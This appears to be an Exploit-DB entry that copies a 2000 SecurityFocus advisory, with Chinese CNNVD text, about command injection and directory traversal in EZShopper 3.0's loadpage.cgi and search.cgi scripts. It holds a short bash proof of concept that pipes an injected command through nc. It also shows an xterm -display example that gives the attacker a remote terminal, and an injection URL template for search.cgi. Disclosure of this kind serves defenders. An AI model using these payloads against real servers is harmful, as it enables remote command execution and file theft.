https://www.exploit-db.com/exploits/19781
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200002-076

EZShopper3.0版本loadpage.cgiCGI脚本存在漏洞。远程攻击者借助..(点点)攻击读取任意文件或借助shell元字符执行命令。

source: http://www.securityfocus.com/bid/1014/info

EZShopper is a perl-based E-Commerce software package offered by Alex Heiphetz Group, Inc. It is possible to remotely compromise a host due to a lack of checks on user input passed directly to the open() call. This vulnerability exists in two scripts shipped with EZShopper, loadpage.cgi and search.cgi. 

In the first vulnerability, the variable passed to open() is called "file" and is submitted to a script called loadpage.cgi. There are no checks on "file", meaning that if "../" preceed an arbitrary filename/path as the file variable, those "../" paths will be followed and the arbitrary file anywhere on the filesystem will be displayed (provided that the uid of the webserver has access to them..). If pipes are included in the variable, arbitrary commands can be executed on the target host possibly giving remote access to the attacker with the uid of the webserver (usually 'nobody'). 

The second vulnerability is identical in nature to the first but is in the "search.cgi" script. In search.cgi, no checks are made on user input variables 'template' and 'database' (passed to open()). As a result, it is possible to view files or execute commands on the host through search.cgi as well.

#!/bin/bash 
echo -e "GET http: //www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=|"$1"| HTTP/1.0nn" | nc proxy.server.com 8080

[ /cut ]

$ ./ezhack.sh /usr/X11R6/bin/xterm%20-display%

(this would send an xterm from the target host to wherever display is)

http: //www.example.com/cgi-bin/search.cgi?user_id=1&database=<insert here>&template=<or insert here>&distinct=1

来源:BID
名称:1014
链接:http://www.securityfocus.com/bid/1014
来源:BUGTRAQ
名称:20000227EZShopper3.0shoppingcartCGIremotecommandexecution
链接:http://archives.neohapsis.com/archives/bugtraq/2000-02/0356.html